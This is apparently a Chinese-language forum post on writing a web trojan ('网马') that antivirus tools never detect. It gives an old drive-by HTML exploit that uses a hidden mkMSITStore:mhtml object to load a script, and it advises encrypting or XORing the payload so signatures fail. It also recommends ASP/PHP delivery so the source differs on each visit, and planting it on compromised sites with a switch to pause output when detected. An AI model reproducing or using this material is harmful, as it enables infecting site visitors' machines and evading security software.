【编写永不被杀网马的思路】
自定义算法:<HTML><HEAD>
<TITLE> </TITLE>
</HEAD>
<BODY>
<SCRIPTLANGUAGE="JavaScript.Encode"src="1.js">
</SCRIPT>
<SCRIPTLANGUAGE="JavaScript">
varurl=document.location.href;url=url.substring(0,url.lastIndexOf('/'));
document.write('<OBJECTWidth=0Height=0style="display:none;"
type="text/x-scriptlet"data="mkMSITStore:mhtml:c:\\.mht!'+url+'/1.js::/%23">
</OBJECT>');
window.status=" ";
</SCRIPT>
</BODY>
<NOSCRIPT><iframestyle="display:none;">
</HTML>
先拿一段以前比较老的网马做说明。
**** Hidden Message *****
这样就现实了加密和解密。
查看网马源代码的时候。就不会有什么特征码。
如果被杀,稍修改一下加密算法就通过。
或者你XOR一下,值又改变了。
如果做成ASP,PHP脚本网马。
就可以实现每一次访问网马,结果源代码内容都不相同。
本人很建议挂马,挂脚本文件,很好控制网马的输出状态。
发现被杀,马上在脚本文件的第一行,终止输出。
这样站也不会掉得太快。改好了再松开,开关。
思维是很重要的。
页:
[1]